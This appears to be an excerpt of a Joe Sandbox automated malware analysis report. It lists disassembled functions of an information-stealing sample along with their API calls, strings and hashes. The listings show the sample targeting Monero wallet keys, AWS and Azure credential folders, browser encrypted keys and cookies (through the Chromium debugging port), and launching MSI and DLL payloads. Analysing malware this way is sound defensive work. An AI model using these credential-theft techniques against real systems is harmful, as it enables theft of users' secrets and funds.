                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: b48d59dfeb6bce74de17a1d13e4be09d9932043d2e5a0fc59034f7be8cc9e427
                                        • Instruction ID: 1fae1986c28a25b0f6b46fcd387a138931914140d60cdc940dc37f8be13678f9
                                        • Opcode Fuzzy Hash: b48d59dfeb6bce74de17a1d13e4be09d9932043d2e5a0fc59034f7be8cc9e427
                                        • Instruction Fuzzy Hash: B9E124B19101089BCB08EBA1DD96EFE7339BF54305F10455AF30A761A1DE397E18CB6A
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0145D480,00000000,?,00501544,00000000,?,?), ref: 004ECB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004ECB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004ECB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004ECBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004ECBD9
                                        • StrStrA.SHLWAPI(?,0145D4C8,00500B56), ref: 004ECBF7
                                        • StrStrA.SHLWAPI(00000000,0145D528), ref: 004ECC1E
                                        • StrStrA.SHLWAPI(?,0145DB40,00000000,?,00501550,00000000,?,00000000,00000000,?,014590E0,00000000,?,0050154C,00000000,?), ref: 004ECDA2
                                        • StrStrA.SHLWAPI(00000000,0145DC60), ref: 004ECDB9
                                          • Part of subcall function 004EC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004EC971
                                          • Part of subcall function 004EC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004EC97C
                                        • StrStrA.SHLWAPI(?,0145DC60,00000000,?,00501554,00000000,?,00000000,01459100), ref: 004ECE5A
                                        • StrStrA.SHLWAPI(00000000,01459050), ref: 004ECE71
                                          • Part of subcall function 004EC920: lstrcat.KERNEL32(?,00500B47), ref: 004ECA43
                                          • Part of subcall function 004EC920: lstrcat.KERNEL32(?,00500B4B), ref: 004ECA57
                                          • Part of subcall function 004EC920: lstrcat.KERNEL32(?,00500B4E), ref: 004ECA78
                                        • lstrlen.KERNEL32(00000000), ref: 004ECF44
                                        • CloseHandle.KERNEL32(00000000), ref: 004ECF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 69a2bae54ce7fcbc58c40e1d15522997e0f38347756e03d5b881b8b297cd7638
                                        • Instruction ID: e9a2ced6ef68f8d87396d50dfce4fc21654d3ea2b91cf65a8fa5a385fcf1980b
                                        • Opcode Fuzzy Hash: 69a2bae54ce7fcbc58c40e1d15522997e0f38347756e03d5b881b8b297cd7638
                                        • Instruction Fuzzy Hash: FAE1FBB190010CABCB14EBA5DCA5FFEB779AF54304F00415EF20A67191EF386A59CB69
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,0145B228,00000000,00020019,00000000,005005BE), ref: 004F8534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004F85B6
                                        • wsprintfA.USER32 ref: 004F85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004F860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F8629
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 0e13d1cdf948b876216a8a99af23b02272ad1f6c993d3999c11b1c02a54b5ef5
                                        • Instruction ID: c45ac9858e28028cc839a22ae456fa6b23178a09cc080b7d535e9b301d89fe09
                                        • Opcode Fuzzy Hash: 0e13d1cdf948b876216a8a99af23b02272ad1f6c993d3999c11b1c02a54b5ef5
                                        • Instruction Fuzzy Hash: F78111B191011C9BDB28DB54CD95FEA77B8BF48704F1082D9F20966180DF786B88CFA9
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004F91FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: `dOF$`dOF$image/jpeg
                                        • API String ID: 2244384528-1895992159
                                        • Opcode ID: 7d2ace3e2c0a708697e40fe43f9cb03c3542480bab1f0946a770b2c6246c0193
                                        • Instruction ID: c36ca69af8ec4e112010f8847b0ea09fa0f6ba1f3936627320ec32f2574ac8a8
                                        • Opcode Fuzzy Hash: 7d2ace3e2c0a708697e40fe43f9cb03c3542480bab1f0946a770b2c6246c0193
                                        • Instruction Fuzzy Hash: AD71E17191020CABDB14EFE5DC85FEEB778BF88701F108609F616A7290DB38A904CB64
                                        APIs
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F5000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 004F501D
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4B7C
                                          • Part of subcall function 004F4B60: FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 004F50A9
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
                                          • Part of subcall function 004F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
                                          • Part of subcall function 004F4B60: FindClose.KERNEL32(000000FF), ref: 004F4DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F5118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004F5135
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4C00
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,005008D3), ref: 004F4C15
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4C32
                                          • Part of subcall function 004F4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 004F4C6E
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,0145E758), ref: 004F4C9A
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,00500FE0), ref: 004F4CAC
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,?), ref: 004F4CC0
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,00500FE4), ref: 004F4CD2
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,?), ref: 004F4CE6
                                          • Part of subcall function 004F4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 004F4CFC
                                          • Part of subcall function 004F4B60: DeleteFileA.KERNEL32(?), ref: 004F4D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 31b5a893363f1d662ea48a0c85e1c1a051dcd536471b157ad42b53023e97b76c
                                        • Instruction ID: 46c8321108ffa5115bbd886042f9f57c432b6ccc8fe8e3956e81e1e008ec936c
                                        • Opcode Fuzzy Hash: 31b5a893363f1d662ea48a0c85e1c1a051dcd536471b157ad42b53023e97b76c
                                        • Instruction Fuzzy Hash: EF41D7BAA4030867DB14F770DC57FED37386B54704F004599B289660C1EEB86BD8CB96
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F3415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F35AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 76bb051041a2ac82a6820d443307e056bf68974004faecd21a97f1ca6d415992
                                        • Instruction ID: 716a76b9acf6fa877c2592bee2aad380d89ca30dc52d7a1f2da24df46153d70f
                                        • Opcode Fuzzy Hash: 76bb051041a2ac82a6820d443307e056bf68974004faecd21a97f1ca6d415992
                                        • Instruction Fuzzy Hash: 1C1210B191010C9ACB14EB91DDA2FFEB739AF14304F00459EF30A66195EF386B59CB69
                                        APIs
                                          • Part of subcall function 004E9A50: InternetOpenA.WININET(00500AF6,00000001,00000000,00000000,00000000), ref: 004E9A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 004E9CAF
                                        • lstrcat.KERNEL32(?,005012C4), ref: 004E9CC1
                                        • lstrcat.KERNEL32(?,?), ref: 004E9CD5
                                        • lstrcat.KERNEL32(?,005012C8), ref: 004E9CE7
                                        • lstrcat.KERNEL32(?,?), ref: 004E9CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 004E9D0D
                                        • lstrlen.KERNEL32(00000000), ref: 004E9D17
                                        • lstrlen.KERNEL32(00000000), ref: 004E9D26
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: f55ac707fac376d46c5cfe3964fcb1118d816295d95a1440108bfb379572edd3
                                        • Instruction ID: d2cfe148f3c1a9008ecdcc6a5a119b02d2c09c750bf2249e82660868285aea12
                                        • Opcode Fuzzy Hash: f55ac707fac376d46c5cfe3964fcb1118d816295d95a1440108bfb379572edd3
                                        • Instruction Fuzzy Hash: 44516171910508ABCB14EBE5DC55FEE7738AF54306F40415DF20AA70D0EB786A48CF65
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E62D0: InternetOpenA.WININET(00500DFF,00000001,00000000,00000000,00000000), ref: 004E6331
                                          • Part of subcall function 004E62D0: StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6353
                                          • Part of subcall function 004E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E6385
                                          • Part of subcall function 004E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E63D5
                                          • Part of subcall function 004E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004E640F
                                          • Part of subcall function 004E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E6421
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5568
                                        • lstrlen.KERNEL32(00000000), ref: 004F557F
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 004F55B4
                                        • lstrlen.KERNEL32(00000000), ref: 004F55D3
                                        • lstrlen.KERNEL32(00000000), ref: 004F55FE
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 32f1d8585695dd8dc593917a044dafecfec9d23151c3db2bf1cf29780e99c632
                                        • Instruction ID: b818d7b3593be4a17a9781b193334feab6971020d4c47d9689fd537b978b5f41
                                        • Opcode Fuzzy Hash: 32f1d8585695dd8dc593917a044dafecfec9d23151c3db2bf1cf29780e99c632
                                        • Instruction Fuzzy Hash: A8514CB091010C9BCB18FF61CDAAAFD3779AF50349F50441EE70A57591EB386B18CB6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: afc5f61ebfe213f4af73ed6d361dd2990b944d80736e994225e5100cfaacb64a
                                        • Instruction ID: 7bb5bb3c69ea19b0cc19cac213274b05af69e0ecc14a157c87ac401381677fe1
                                        • Opcode Fuzzy Hash: afc5f61ebfe213f4af73ed6d361dd2990b944d80736e994225e5100cfaacb64a
                                        • Instruction Fuzzy Hash: BAC1A4B590010D9BCB14EF60DC99FEE7379AF54308F00459EF60997281DA78EA94CFA5
                                        APIs
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F453C
                                        • lstrcat.KERNEL32(?,0145E358), ref: 004F455B
                                        • lstrcat.KERNEL32(?,?), ref: 004F456F
                                        • lstrcat.KERNEL32(?,0145D3F0), ref: 004F4583
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F8F20: GetFileAttributesA.KERNEL32(00000000,?,004E1B94,?,?,0050577C,?,?,00500E22), ref: 004F8F2F
                                          • Part of subcall function 004EA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004EA489
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F9550: GlobalAlloc.KERNEL32(00000000,004F462D,004F462D), ref: 004F9563
                                        • StrStrA.SHLWAPI(?,0145E100), ref: 004F4643
                                        • GlobalFree.KERNEL32(?), ref: 004F4762
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA23F
                                          • Part of subcall function 004EA210: LocalAlloc.KERNEL32(00000040,?,?,?,004E4F3E,00000000,?), ref: 004EA251
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA27A
                                          • Part of subcall function 004EA210: LocalFree.KERNEL32(?,?,?,?,004E4F3E,00000000,?), ref: 004EA28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F46F3
                                        • StrCmpCA.SHLWAPI(?,005008D2), ref: 004F4710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F4722
                                        • lstrcat.KERNEL32(00000000,?), ref: 004F4735
                                        • lstrcat.KERNEL32(00000000,00500FA0), ref: 004F4744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 38314b373589503cb70e8b9b76d34036a3bcbb1da58224b5c9c74c703cb9f0f3
                                        • Instruction ID: 1b44e037558b9f8faf49e2634e9ff825e30199d3e7831afa09a3c8c69f58e4a0
                                        • Opcode Fuzzy Hash: 38314b373589503cb70e8b9b76d34036a3bcbb1da58224b5c9c74c703cb9f0f3
                                        • Instruction Fuzzy Hash: 6A7177B6900208ABDF14EBA1DD45FEE7379AF88304F00859DF605A6181EB38EB58CF55
                                        APIs
                                          • Part of subcall function 004E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004E12B4
                                          • Part of subcall function 004E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004E12BB
                                          • Part of subcall function 004E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004E12D7
                                          • Part of subcall function 004E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004E12F5
                                          • Part of subcall function 004E12A0: RegCloseKey.ADVAPI32(?), ref: 004E12FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 004E134F
                                        • lstrlen.KERNEL32(?), ref: 004E135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 004E1377
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004E1465
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 004E14EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: bd4c79d318db1ad959f2e248253705a606a79c40142e72a40279aaa612861d25
                                        • Instruction ID: d0077ad2edc02528ec08b31accd7f4372f6ba4813393e9ed77d550f4ae6f8606
                                        • Opcode Fuzzy Hash: bd4c79d318db1ad959f2e248253705a606a79c40142e72a40279aaa612861d25
                                        • Instruction Fuzzy Hash: AF514DB1D5011C5BCB15EB61DDA6FED733CAB50304F4045DDB30A62092EE386B98CAAA
                                        APIs
                                        • InternetOpenA.WININET(00500AF6,00000001,00000000,00000000,00000000), ref: 004E9A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004E9AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 004E9AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 2f45c1682dbb7d0b60eb35e1d40fda76b0f5551cbfae96c5fac0e7c021cab54a
                                        • Instruction ID: 15c118ce9e85331c3bb982f9a5f09cefb8634aeff52e15b7e385c40a932545de
